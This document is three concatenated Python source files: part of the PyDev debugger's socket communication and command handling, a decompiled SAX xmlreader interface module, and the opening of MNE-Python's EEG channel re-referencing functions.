sys.stderr.write('%s\n' % (out_message,))
except:
pass
if IS_PY3K:
out = bytearray(out, 'utf-8')
self.sock.send(out) #TODO: this does not guarantee that all message are sent (and jython does not have a send all)
if cmd.id == CMD_EXIT:
break
if time is None:
break #interpreter shutdown
time.sleep(self.timeout)
except Exception:
GlobalDebuggerHolder.globalDbg.FinishDebuggingSession()
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 0:
traceback.print_exc()
#--------------------------------------------------- CREATING THE SOCKET THREADS
#=======================================================================================================================
# StartServer
#=======================================================================================================================
def StartServer(port):
""" binds to a port, waits for the debugger to connect """
s = socket(AF_INET, SOCK_STREAM)
s.bind(('', port))
s.listen(1)
newSock, _addr = s.accept()
return newSock
#=======================================================================================================================
# StartClient
#=======================================================================================================================
def StartClient(host, port):
""" connects to a host/port """
PydevdLog(1, "Connecting to ", host, ":", str(port))
s = socket(AF_INET, SOCK_STREAM)
MAX_TRIES = 3
i = 0
while i<MAX_TRIES:
try:
s.connect((host, port))
except:
i+=1
time.sleep(0.2)
continue
PydevdLog(1, "Connected.")
return s
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
sys.stderr.flush()
traceback.print_exc()
sys.exit(1) #TODO: is it safe?
#------------------------------------------------------------------------------------ MANY COMMUNICATION STUFF
#=======================================================================================================================
# NetCommand
#=======================================================================================================================
class NetCommand:
""" Commands received/sent over the network.
Command can represent command received from the debugger,
or one to be sent by daemon.
"""
next_seq = 0 # sequence numbers
def __init__(self, id, seq, text):
""" smart handling of paramaters
if sequence is 0, new sequence will be generated
if text has carriage returns they'll be replaced"""
self.id = id
if (seq == 0): seq = self.getNextSeq()
self.seq = seq
self.text = text
self.outgoing = self.makeMessage(id, seq, text)
def getNextSeq(self):
""" returns next sequence number """
NetCommand.next_seq += 2
return NetCommand.next_seq
def getOutgoing(self):
""" returns the outgoing message"""
return self.outgoing
def makeMessage(self, cmd, seq, payload):
encoded = quote(to_string(payload), '/<>_=" \t')
return str(cmd) + '\t' + str(seq) + '\t' + encoded + "\n"
#=======================================================================================================================
# NetCommandFactory
#=======================================================================================================================
class NetCommandFactory:
def __init_(self):
self.next_seq = 0
def threadToXML(self, thread):
""" thread information as XML """
name = pydevd_vars.makeValidXmlValue(thread.getName())
cmdText = '<thread name="%s" id="%s" />' % (quote(name), GetThreadId(thread))
return cmdText
def makeErrorMessage(self, seq, text):
cmd = NetCommand(CMD_ERROR, seq, text)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
sys.stderr.write("Error: %s" % (text,))
return cmd
def makeThreadCreatedMessage(self, thread):
cmdText = "<xml>" + self.threadToXML(thread) + "</xml>"
return NetCommand(CMD_THREAD_CREATE, 0, cmdText)
def makeListThreadsMessage(self, seq):
""" returns thread listing as XML """
try:
t = threading.enumerate()
cmdText = "<xml>"
for i in t:
if t.isAlive():
cmdText += self.threadToXML(i)
cmdText += "</xml>"
return NetCommand(CMD_RETURN, seq, cmdText)
except:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeVariableChangedMessage(self, seq, payload):
# notify debugger that value was changed successfully
return NetCommand(CMD_RETURN, seq, payload)
def makeIoMessage(self, v, ctx, dbg=None):
'''
@param v: the message to pass to the debug server
@param ctx: 1 for stdio 2 for stderr
@param dbg: If not none, add to the writer
'''
try:
if len(v) > MAX_IO_MSG_SIZE:
v = v[0:MAX_IO_MSG_SIZE]
v += '...'
v = pydevd_vars.makeValidXmlValue(quote(v, '/>_= \t'))
net = NetCommand(str(CMD_WRITE_TO_CONSOLE), 0, '<xml><io s="%s" ctx="%s"/></xml>' % (v, ctx))
except:
net = self.makeErrorMessage(0, GetExceptionTracebackStr())
if dbg:
dbg.writer.addCommand(net)
return net
def makeVersionMessage(self, seq):
try:
return NetCommand(CMD_VERSION, seq, VERSION_STRING)
except:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeThreadKilledMessage(self, id):
try:
return NetCommand(CMD_THREAD_KILL, 0, str(id))
except:
return self.makeErrorMessage(0, GetExceptionTracebackStr())
def makeThreadSuspendMessage(self, thread_id, frame, stop_reason, message):
""" <xml>
<thread id="id" stop_reason="reason">
<frame id="id" name="functionName " file="file" line="line">
<var variable stuffff....
</frame>
</thread>
"""
try:
cmdTextList = ["<xml>"]
if message:
message = pydevd_vars.makeValidXmlValue(str(message))
cmdTextList.append('<thread id="%s" stop_reason="%s" message="%s">' % (thread_id, stop_reason, message))
curFrame = frame
try:
while curFrame:
#print cmdText
myId = str(id(curFrame))
#print "id is ", myId
if curFrame.f_code is None:
break #Iron Python sometimes does not have it!
myName = curFrame.f_code.co_name #method name (if in method) or ? if global
if myName is None:
break #Iron Python sometimes does not have it!
#print "name is ", myName
filename, base = pydevd_file_utils.GetFilenameAndBase(curFrame)
myFile = pydevd_file_utils.NormFileToClient(filename)
#print "file is ", myFile
#myFile = inspect.getsourcefile(curFrame) or inspect.getfile(frame)
myLine = str(curFrame.f_lineno)
#print "line is ", myLine
#the variables are all gotten 'on-demand'
#variables = pydevd_vars.frameVarsToXML(curFrame.f_locals)
variables = ''
cmdTextList.append('<frame id="%s" name="%s" ' % (myId , pydevd_vars.makeValidXmlValue(myName)))
cmdTextList.append('file="%s" line="%s">"' % (quote(myFile, '/>_= \t'), myLine))
cmdTextList.append(variables)
cmdTextList.append("</frame>")
curFrame = curFrame.f_back
except :
traceback.print_exc()
cmdTextList.append("</thread></xml>")
cmdText = ''.join(cmdTextList)
return NetCommand(CMD_THREAD_SUSPEND, 0, cmdText)
except:
return self.makeErrorMessage(0, GetExceptionTracebackStr())
def makeThreadRunMessage(self, id, reason):
try:
return NetCommand(CMD_THREAD_RUN, 0, str(id) + "\t" + str(reason))
except:
return self.makeErrorMessage(0, GetExceptionTracebackStr())
def makeGetVariableMessage(self, seq, payload):
try:
return NetCommand(CMD_GET_VARIABLE, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeGetFrameMessage(self, seq, payload):
try:
return NetCommand(CMD_GET_FRAME, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeEvaluateExpressionMessage(self, seq, payload):
try:
return NetCommand(CMD_EVALUATE_EXPRESSION, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeGetCompletionsMessage(self, seq, payload):
try:
return NetCommand(CMD_GET_COMPLETIONS, seq, payload)
except Exception:
return self.makeErrorMessage(seq, GetExceptionTracebackStr())
def makeLoadSourceMessage(self, seq, source, dbg=None):
try:
net = NetCommand(CMD_LOAD_SOURCE, seq, '%s' % source)
except:
net = self.makeErrorMessage(0, GetExceptionTracebackStr())
if dbg:
dbg.writer.addCommand(net)
return net
def makeExitMessage(self):
try:
net = NetCommand(CMD_EXIT, 0, '')
except:
net = self.makeErrorMessage(0, GetExceptionTracebackStr())
return net
INTERNAL_TERMINATE_THREAD = 1
INTERNAL_SUSPEND_THREAD = 2
#=======================================================================================================================
# InternalThreadCommand
#=======================================================================================================================
class InternalThreadCommand:
""" internal commands are generated/executed by the debugger.
The reason for their existence is that some commands have to be executed
on specific threads. These are the InternalThreadCommands that get
get posted to PyDB.cmdQueue.
"""
def canBeExecutedBy(self, thread_id):
'''By default, it must be in the same thread to be executed
'''
return self.thread_id == thread_id
def doIt(self, dbg):
raise NotImplementedError("you have to override doIt")
#=======================================================================================================================
# InternalTerminateThread
#=======================================================================================================================
class InternalTerminateThread(InternalThreadCommand):
def __init__(self, thread_id):
self.thread_id = thread_id
def doIt(self, dbg):
PydevdLog(1, "killing ", str(self.thread_id))
cmd = dbg.cmdFactory.makeThreadKilledMessage(self.thread_id)
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalRunThread
#=======================================================================================================================
class InternalRunThread(InternalThreadCommand):
def __init__(self, thread_id):
self.thread_id = thread_id
def doIt(self, dbg):
t = PydevdFindThreadById(self.thread_id)
if t:
t.additionalInfo.pydev_step_cmd = None
t.additionalInfo.pydev_step_stop = None
t.additionalInfo.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalStepThread
#=======================================================================================================================
class InternalStepThread(InternalThreadCommand):
def __init__(self, thread_id, cmd_id):
self.thread_id = thread_id
self.cmd_id = cmd_id
def doIt(self, dbg):
t = PydevdFindThreadById(self.thread_id)
if t:
t.additionalInfo.pydev_step_cmd = self.cmd_id
t.additionalInfo.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalSetNextStatementThread
#=======================================================================================================================
class InternalSetNextStatementThread(InternalThreadCommand):
def __init__(self, thread_id, cmd_id, line, func_name):
self.thread_id = thread_id
self.cmd_id = cmd_id
self.line = line
self.func_name = func_name
def doIt(self, dbg):
t = PydevdFindThreadById(self.thread_id)
if t:
t.additionalInfo.pydev_step_cmd = self.cmd_id
t.additionalInfo.pydev_next_line = int(self.line)
t.additionalInfo.pydev_func_name = self.func_name
t.additionalInfo.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalGetVariable
#=======================================================================================================================
class InternalGetVariable(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, scope, attrs):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.attributes = attrs
def doIt(self, dbg):
""" Converts request into python variable """
try:
xml = "<xml>"
valDict = pydevd_vars.resolveCompoundVariable(self.thread_id, self.frame_id, self.scope, self.attributes)
if valDict is None:
valDict = {}
keys = valDict.keys()
if hasattr(keys, 'sort'):
keys.sort(compare_object_attrs) #Python 3.0 does not have it
else:
if IS_PY3K:
keys = sorted(keys, key=cmp_to_key(compare_object_attrs)) #Jython 2.1 does not have it (and all must be compared as strings).
else:
keys = sorted(keys, cmp=compare_object_attrs) #Jython 2.1 does not have it (and all must be compared as strings).
for k in keys:
xml += pydevd_vars.varToXML(valDict[k], to_string(k))
xml += "</xml>"
cmd = dbg.cmdFactory.makeGetVariableMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except Exception:
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error resolving variables " + GetExceptionTracebackStr())
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalChangeVariable
#=======================================================================================================================
class InternalChangeVariable(InternalThreadCommand):
""" changes the value of a variable """
def __init__(self, seq, thread_id, frame_id, scope, attr, expression):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.attr = attr
self.expression = expression
def doIt(self, dbg):
""" Converts request into python variable """
try:
result = pydevd_vars.changeAttrExpression(self.thread_id, self.frame_id, self.attr, self.expression)
xml = "<xml>"
xml += pydevd_vars.varToXML(result, "")
xml += "</xml>"
cmd = dbg.cmdFactory.makeVariableChangedMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except Exception:
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error changing variable attr:%s expression:%s traceback:%s" % (self.attr, self.expression, GetExceptionTracebackStr()))
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalGetFrame
#=======================================================================================================================
class InternalGetFrame(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
def doIt(self, dbg):
""" Converts request into python variable """
try:
frame = pydevd_vars.findFrame(self.thread_id, self.frame_id)
if frame is not None:
xml = "<xml>"
xml += pydevd_vars.frameVarsToXML(frame.f_locals)
del frame
xml += "</xml>"
cmd = dbg.cmdFactory.makeGetFrameMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
else:
#pydevd_vars.dumpFrames(self.thread_id)
#don't print this error: frame not found: means that the client is not synchronized (but that's ok)
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Frame not found: %s from thread: %s" % (self.frame_id, self.thread_id))
dbg.writer.addCommand(cmd)
except:
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error resolving frame: %s from thread: %s" % (self.frame_id, self.thread_id))
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalEvaluateExpression
#=======================================================================================================================
class InternalEvaluateExpression(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, expression, doExec, doTrim):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.expression = expression
self.doExec = doExec
self.doTrim = doTrim
def doIt(self, dbg):
""" Converts request into python variable """
try:
result = pydevd_vars.evaluateExpression(self.thread_id, self.frame_id, self.expression, self.doExec)
xml = "<xml>"
xml += pydevd_vars.varToXML(result, "", self.doTrim)
xml += "</xml>"
cmd = dbg.cmdFactory.makeEvaluateExpressionMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except:
exc = GetExceptionTracebackStr()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error evaluating expression " + exc)
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# InternalConsoleExec
#=======================================================================================================================
class InternalConsoleExec(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, expression):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.expression = expression
def doIt(self, dbg):
""" Converts request into python variable """
pydev_start_new_thread = None
try:
try:
pydev_start_new_thread = thread.start_new_thread
thread.start_new_thread = thread._original_start_new_thread #don't trace new threads created by console command
thread.start_new = thread._original_start_new_thread
result = pydevconsole.consoleExec(self.thread_id, self.frame_id, self.expression)
xml = "<xml>"
xml += pydevd_vars.varToXML(result, "")
xml += "</xml>"
cmd = dbg.cmdFactory.makeEvaluateExpressionMessage(self.sequence, xml)
dbg.writer.addCommand(cmd)
except:
exc = GetExceptionTracebackStr()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error evaluating console expression " + exc)
dbg.writer.addCommand(cmd)
finally:
thread.start_new_thread = pydev_start_new_thread
thread.start_new = pydev_start_new_thread
sys.stderr.flush()
sys.stdout.flush()
#=======================================================================================================================
# InternalGetCompletions
#=======================================================================================================================
class InternalGetCompletions(InternalThreadCommand):
""" Gets the completions in a given scope """
def __init__(self, seq, thread_id, frame_id, act_tok):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.act_tok = act_tok
def doIt(self, dbg):
""" Converts request into completions """
try:
remove_path = None
try:
import _completer
except:
try:
path = os.environ['PYDEV_COMPLETER_PYTHONPATH']
except :
path = os.path.dirname(__file__)
sys.path.append(path)
remove_path = path
try:
import _completer
except :
pass
try:
frame = pydevd_vars.findFrame(self.thread_id, self.frame_id)
if frame is not None:
#Not using frame.f_globals because of https://sourceforge.net/tracker2/?func=detail&aid=2541355&group_id=85796&atid=577329
#(Names not resolved in generator expression in method)
#See message: http://mail.python.org/pipermail/python-list/2009-January/526522.html
updated_globals = {}
updated_globals.update(frame.f_globals)
updated_globals.update(frame.f_locals) #locals later because it has precedence over the actual globals
locals = frame.f_locals
else:
updated_globals = {}
locals = {}
if pydevconsole.IPYTHON:
completions = pydevconsole.get_completions(self.act_tok, self.act_tok, updated_globals, locals)
else:
try:
completer = _completer.Completer(updated_globals, None)
#list(tuple(name, descr, parameters, type))
completions = completer.complete(self.act_tok)
except :
completions = []
def makeValid(s):
return pydevd_vars.makeValidXmlValue(pydevd_vars.quote(s, '/>_= \t'))
msg = "<xml>"
for comp in completions:
msg += '<comp p0="%s" p1="%s" p2="%s" p3="%s"/>' % (makeValid(comp[0]), makeValid(comp[1]), makeValid(comp[2]), makeValid(comp[3]),)
msg += "</xml>"
cmd = dbg.cmdFactory.makeGetCompletionsMessage(self.sequence, msg)
dbg.writer.addCommand(cmd)
finally:
if remove_path is not None:
sys.path.remove(remove_path)
except:
exc = GetExceptionTracebackStr()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmdFactory.makeErrorMessage(self.sequence, "Error getting completion " + exc)
dbg.writer.addCommand(cmd)
#=======================================================================================================================
# PydevdFindThreadById
#=======================================================================================================================
def PydevdFindThreadById(thread_id):
try:
# there was a deadlock here when I did not remove the tracing function when thread was dead
threads = threading.enumerate()
for i in threads:
if thread_id == GetThreadId(i):
return i
sys.stderr.write("Could not find thread %s\n" % thread_id)
sys.stderr.write("Available: %s\n" % [GetThreadId(t) for t in threads])
sys.stderr.flush()
except:
traceback.print_exc()
return None
|
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: xmlreader.py
"""An XML Reader is the SAX 2 name for an XML parser. XML Parsers
should be based on this code. """
import handler
from _exceptions import SAXNotSupportedException, SAXNotRecognizedException
class XMLReader:
"""Interface for reading an XML document using callbacks.
XMLReader is the interface that an XML parser's SAX2 driver must
implement. This interface allows an application to set and query
features and properties in the parser, to register event handlers
for document processing, and to initiate a document parse.
All SAX interfaces are assumed to be synchronous: the parse
methods must not return until parsing is complete, and readers
must wait for an event-handler callback to return before reporting
the next event."""
def __init__(self):
self._cont_handler = handler.ContentHandler()
self._dtd_handler = handler.DTDHandler()
self._ent_handler = handler.EntityResolver()
self._err_handler = handler.ErrorHandler()
def parse(self, source):
"""Parse an XML document from a system identifier or an InputSource."""
raise NotImplementedError('This method must be implemented!')
def getContentHandler(self):
"""Returns the current ContentHandler."""
return self._cont_handler
def setContentHandler(self, handler):
"""Registers a new object to receive document content events."""
self._cont_handler = handler
def getDTDHandler(self):
"""Returns the current DTD handler."""
return self._dtd_handler
def setDTDHandler(self, handler):
"""Register an object to receive basic DTD-related events."""
self._dtd_handler = handler
def getEntityResolver(self):
"""Returns the current EntityResolver."""
return self._ent_handler
def setEntityResolver(self, resolver):
"""Register an object to resolve external entities."""
self._ent_handler = resolver
def getErrorHandler(self):
"""Returns the current ErrorHandler."""
return self._err_handler
def setErrorHandler(self, handler):
"""Register an object to receive error-message events."""
self._err_handler = handler
def setLocale(self, locale):
"""Allow an application to set the locale for errors and warnings.
SAX parsers are not required to provide localization for errors
and warnings; if they cannot support the requested locale,
however, they must throw a SAX exception. Applications may
request a locale change in the middle of a parse."""
raise SAXNotSupportedException('Locale support not implemented')
def getFeature(self, name):
"""Looks up and returns the state of a SAX2 feature."""
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
"""Sets the state of a SAX2 feature."""
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def getProperty(self, name):
"""Looks up and returns the value of a SAX2 property."""
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
"""Sets the value of a SAX2 property."""
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
class IncrementalParser(XMLReader):
"""This interface adds three extra methods to the XMLReader
interface that allow XML parsers to support incremental
parsing. Support for this interface is optional, since not all
underlying XML parsers support this functionality.
When the parser is instantiated it is ready to begin accepting
data from the feed method immediately. After parsing has been
finished with a call to close the reset method must be called to
make the parser ready to accept new data, either from feed or
using the parse method.
Note that these methods must _not_ be called during parsing, that
is, after parse has been called and before it returns.
By default, the class also implements the parse method of the XMLReader
interface using the feed, close and reset methods of the
IncrementalParser interface as a convenience to SAX 2.0 driver
writers."""
def __init__(self, bufsize=65536):
self._bufsize = bufsize
XMLReader.__init__(self)
def parse(self, source):
import saxutils
source = saxutils.prepare_input_source(source)
self.prepareParser(source)
file = source.getByteStream()
buffer = file.read(self._bufsize)
while buffer != '':
self.feed(buffer)
buffer = file.read(self._bufsize)
self.close()
def feed(self, data):
"""This method gives the raw XML data in the data parameter to
the parser and makes it parse the data, emitting the
corresponding events. It is allowed for XML constructs to be
split across several calls to feed.
feed may raise SAXException."""
raise NotImplementedError('This method must be implemented!')
def prepareParser(self, source):
"""This method is called by the parse implementation to allow
the SAX 2.0 driver to prepare itself for parsing."""
raise NotImplementedError('prepareParser must be overridden!')
def close(self):
"""This method is called when the entire XML document has been
passed to the parser through the feed method, to notify the
parser that there are no more data. This allows the parser to
do the final checks on the document and empty the internal
data buffer.
The parser will not be ready to parse another document until
the reset method has been called.
close may raise SAXException."""
raise NotImplementedError('This method must be implemented!')
def reset(self):
"""This method is called after close has been called to reset
the parser so that it is ready to parse new documents. The
results of calling parse or feed after close without calling
reset are undefined."""
raise NotImplementedError('This method must be implemented!')
class Locator:
"""Interface for associating a SAX event with a document
location. A locator object will return valid results only during
calls to DocumentHandler methods; at any other time, the
results are unpredictable."""
def getColumnNumber(self):
"""Return the column number where the current event ends."""
return -1
def getLineNumber(self):
"""Return the line number where the current event ends."""
return -1
def getPublicId(self):
"""Return the public identifier for the current event."""
return None
def getSystemId(self):
"""Return the system identifier for the current event."""
return None
class InputSource:
"""Encapsulation of the information needed by the XMLReader to
read entities.
This class may include information about the public identifier,
system identifier, byte stream (possibly with character encoding
information) and/or the character stream of an entity.
Applications will create objects of this class for use in the
XMLReader.parse method and for returning from
EntityResolver.resolveEntity.
An InputSource belongs to the application, the XMLReader is not
allowed to modify InputSource objects passed to it from the
application, although it may make copies and modify those."""
def __init__(self, system_id=None):
self.__system_id = system_id
self.__public_id = None
self.__encoding = None
self.__bytefile = None
self.__charfile = None
return
def setPublicId(self, public_id):
"""Sets the public identifier of this InputSource."""
self.__public_id = public_id
def getPublicId(self):
"""Returns the public identifier of this InputSource."""
return self.__public_id
def setSystemId(self, system_id):
"""Sets the system identifier of this InputSource."""
self.__system_id = system_id
def getSystemId(self):
"""Returns the system identifier of this InputSource."""
return self.__system_id
def setEncoding(self, encoding):
"""Sets the character encoding of this InputSource.
The encoding must be a string acceptable for an XML encoding
declaration (see section 4.3.3 of the XML recommendation).
The encoding attribute of the InputSource is ignored if the
InputSource also contains a character stream."""
self.__encoding = encoding
def getEncoding(self):
"""Get the character encoding of this InputSource."""
return self.__encoding
def setByteStream(self, bytefile):
"""Set the byte stream (a Python file-like object which does
not perform byte-to-character conversion) for this input
source.
The SAX parser will ignore this if there is also a character
stream specified, but it will use a byte stream in preference
to opening a URI connection itself.
If the application knows the character encoding of the byte
stream, it should set it with the setEncoding method."""
self.__bytefile = bytefile
def getByteStream(self):
"""Get the byte stream for this input source.
The getEncoding method will return the character encoding for
this byte stream, or None if unknown."""
return self.__bytefile
def setCharacterStream(self, charfile):
"""Set the character stream for this input source. (The stream
must be a Python 2.0 Unicode-wrapped file-like that performs
conversion to Unicode strings.)
If there is a character stream specified, the SAX parser will
ignore any byte stream and will not attempt to open a URI
connection to the system identifier."""
self.__charfile = charfile
def getCharacterStream(self):
"""Get the character stream for this input source."""
return self.__charfile
class AttributesImpl:
def __init__(self, attrs):
"""Non-NS-aware implementation.
attrs should be of the form {name : value}."""
self._attrs = attrs
def getLength(self):
return len(self._attrs)
def getType(self, name):
return 'CDATA'
def getValue(self, name):
return self._attrs[name]
def getValueByQName(self, name):
return self._attrs[name]
def getNameByQName(self, name):
if name not in self._attrs:
raise KeyError, name
return name
def getQNameByName(self, name):
if name not in self._attrs:
raise KeyError, name
return name
def getNames(self):
return self._attrs.keys()
def getQNames(self):
return self._attrs.keys()
def __len__(self):
return len(self._attrs)
def __getitem__(self, name):
return self._attrs[name]
def keys(self):
return self._attrs.keys()
def has_key(self, name):
return name in self._attrs
def __contains__(self, name):
return name in self._attrs
def get(self, name, alternative=None):
return self._attrs.get(name, alternative)
def copy(self):
return self.__class__(self._attrs)
def items(self):
return self._attrs.items()
def values(self):
return self._attrs.values()
class AttributesNSImpl(AttributesImpl):
def __init__(self, attrs, qnames):
"""NS-aware implementation.
attrs should be of the form {(ns_uri, lname): value, ...}.
qnames of the form {(ns_uri, lname): qname, ...}."""
self._attrs = attrs
self._qnames = qnames
def getValueByQName(self, name):
for nsname, qname in self._qnames.items():
if qname == name:
return self._attrs[nsname]
raise KeyError, name
def getNameByQName(self, name):
for nsname, qname in self._qnames.items():
if qname == name:
return nsname
raise KeyError, name
def getQNameByName(self, name):
return self._qnames[name]
def getQNames(self):
return self._qnames.values()
def copy(self):
return self.__class__(self._attrs, self._qnames)
def _test():
XMLReader()
IncrementalParser()
Locator()
if __name__ == '__main__':
_test()
|
|
# Authors: Marijn van Vliet <w.m.vanvliet@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Teon Brooks <teon.brooks@gmail.com>
#
# License: BSD-3-Clause
import numpy as np
from .constants import FIFF
from .meas_info import _check_ch_keys
from .proj import _has_eeg_average_ref_proj, make_eeg_average_ref_proj
from .proj import setup_proj
from .pick import pick_types, pick_channels, pick_channels_forward
from .base import BaseRaw
from ..evoked import Evoked
from ..epochs import BaseEpochs
from ..fixes import pinv
from ..utils import (logger, warn, verbose, _validate_type, _check_preload,
_check_option, fill_doc)
from ..defaults import DEFAULTS
def _copy_channel(inst, ch_name, new_ch_name):
"""Add a copy of a channel specified by ch_name.
Input data can be in the form of Raw, Epochs or Evoked.
The instance object is modified inplace.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Data containing the EEG channels
ch_name : str
Name of the channel to copy.
new_ch_name : str
Name given to the copy of the channel.
Returns
-------
inst : instance of Raw | Epochs | Evoked
The data with a copy of a given channel.
"""
new_inst = inst.copy().pick_channels([ch_name])
new_inst.rename_channels({ch_name: new_ch_name})
inst.add_channels([new_inst], force_update_info=True)
return inst
def _check_before_reference(inst, ref_from, ref_to, ch_type):
"""Prepare instance for referencing."""
# Check to see that data is preloaded
_check_preload(inst, "Applying a reference")
ch_type = _get_ch_type(inst, ch_type)
ch_dict = {**{type_: True for type_ in ch_type},
'meg': False, 'ref_meg': False}
eeg_idx = pick_types(inst.info, **ch_dict)
if ref_to is None:
ref_to = [inst.ch_names[i] for i in eeg_idx]
extra = 'EEG channels found'
else:
extra = 'channels supplied'
if len(ref_to) == 0:
raise ValueError('No %s to apply the reference to' % (extra,))
# After referencing, existing SSPs might not be valid anymore.
projs_to_remove = []
for i, proj in enumerate(inst.info['projs']):
# Remove any average reference projections
if proj['desc'] == 'Average EEG reference' or \
proj['kind'] == FIFF.FIFFV_PROJ_ITEM_EEG_AVREF:
logger.info('Removing existing average EEG reference '
'projection.')
# Don't remove the projection right away, but do this at the end of
# this loop.
projs_to_remove.append(i)
# Inactive SSPs may block re-referencing
elif (not proj['active'] and
len([ch for ch in (ref_from + ref_to)
if ch in proj['data']['col_names']]) > 0):
raise RuntimeError(
'Inactive signal space projection (SSP) operators are '
'present that operate on sensors involved in the desired '
'referencing scheme. These projectors need to be applied '
'using the apply_proj() method function before the desired '
'reference can be set.'
)
for i in projs_to_remove:
del inst.info['projs'][i]
# Need to call setup_proj after changing the projs:
inst._projector, _ = \
setup_proj(inst.info, add_eeg_ref=False, activate=False)
# If the reference touches EEG/ECoG/sEEG/DBS electrodes, note in the
# info that a non-CAR has been applied.
ref_to_channels = pick_channels(inst.ch_names, ref_to, ordered=True)
if len(np.intersect1d(ref_to_channels, eeg_idx)) > 0:
with inst.info._unlock():
inst.info['custom_ref_applied'] = FIFF.FIFFV_MNE_CUSTOM_REF_ON
return ref_to
def _apply_reference(inst, ref_from, ref_to=None, forward=None,
ch_type='auto'):
"""Apply a custom EEG referencing scheme."""
ref_to = _check_before_reference(inst, ref_from, ref_to, ch_type)
# Compute reference
if len(ref_from) > 0:
# this is guaranteed below, but we should avoid the crazy pick_channels
# behavior that [] gives all. Also use ordered=True just to make sure
# that all supplied channels actually exist.
assert len(ref_to) > 0
ref_names = ref_from
ref_from = pick_channels(inst.ch_names, ref_from, ordered=True)
ref_to = pick_channels(inst.ch_names, ref_to, ordered=True)
data = inst._data
ref_data = data[..., ref_from, :].mean(-2, keepdims=True)
data[..., ref_to, :] -= ref_data
ref_data = ref_data[..., 0, :]
# REST
if forward is not None:
# use ch_sel and the given forward
forward = pick_channels_forward(forward, ref_names, ordered=True)
# 1-3. Compute a forward (G) and avg-ref'ed data (done above)
G = forward['sol']['data']
assert G.shape[0] == len(ref_names)
# 4. Compute the forward (G) and average-reference it (Ga):
Ga = G - np.mean(G, axis=0, keepdims=True)
# 5. Compute the Ga_inv by SVD
Ga_inv = pinv(Ga, rtol=1e-6)
# 6. Compute Ra = (G @ Ga_inv) in eq (8) from G and Ga_inv
Ra = G @ Ga_inv
# 7-8. Compute Vp = Ra @ Va; then Vpa=average(Vp)
Vpa = np.mean(Ra @ data[..., ref_from, :], axis=-2, keepdims=True)
data[..., ref_to, :] += Vpa
else:
ref_data = None
return inst, ref_data
@fill_doc
def add_reference_channels(inst, ref_channels, copy=True):
"""Add reference channels to data that consists of all zeros.
Adds reference channels to data that were not included during recording.
This is useful when you need to re-reference your data to different
channels. These added channels will consist of all zeros.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Instance of Raw or Epochs with EEG channels and reference channel(s).
%(ref_channels)s
copy : bool
Specifies whether the data will be copied (True) or modified in-place
(False). Defaults to True.
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with added EEG reference channels.
"""
# Check to see that data is preloaded
_check_preload(inst, 'add_reference_channels')
_validate_type(ref_channels, (list, tuple, str), 'ref_channels')
if isinstance(ref_channels, str):
ref_channels = [ref_channels]
for ch in ref_channels:
if ch in inst.info['ch_names']:
raise ValueError("Channel %s already specified in inst." % ch)
# Once CAR is applied (active), don't allow adding channels
if _has_eeg_average_ref_proj(inst.info['projs'], check_active=True):
raise RuntimeError('Average reference already applied to data.')
if copy:
inst = inst.copy()
if isinstance(inst, (BaseRaw, Evoked)):
data = inst._data
refs = np.zeros((len(ref_channels), data.shape[1]))
data = np.vstack((data, refs))
inst._data = data
elif isinstance(inst, BaseEpochs):
data = inst._data
x, y, z = data.shape
refs = np.zeros((x * len(ref_channels), z))
data = np.vstack((data.reshape((x * y, z), order='F'), refs))
data = data.reshape(x, y + len(ref_channels), z, order='F')
inst._data = data
else:
raise TypeError("inst should be Raw, Epochs, or Evoked instead of %s."
% type(inst))
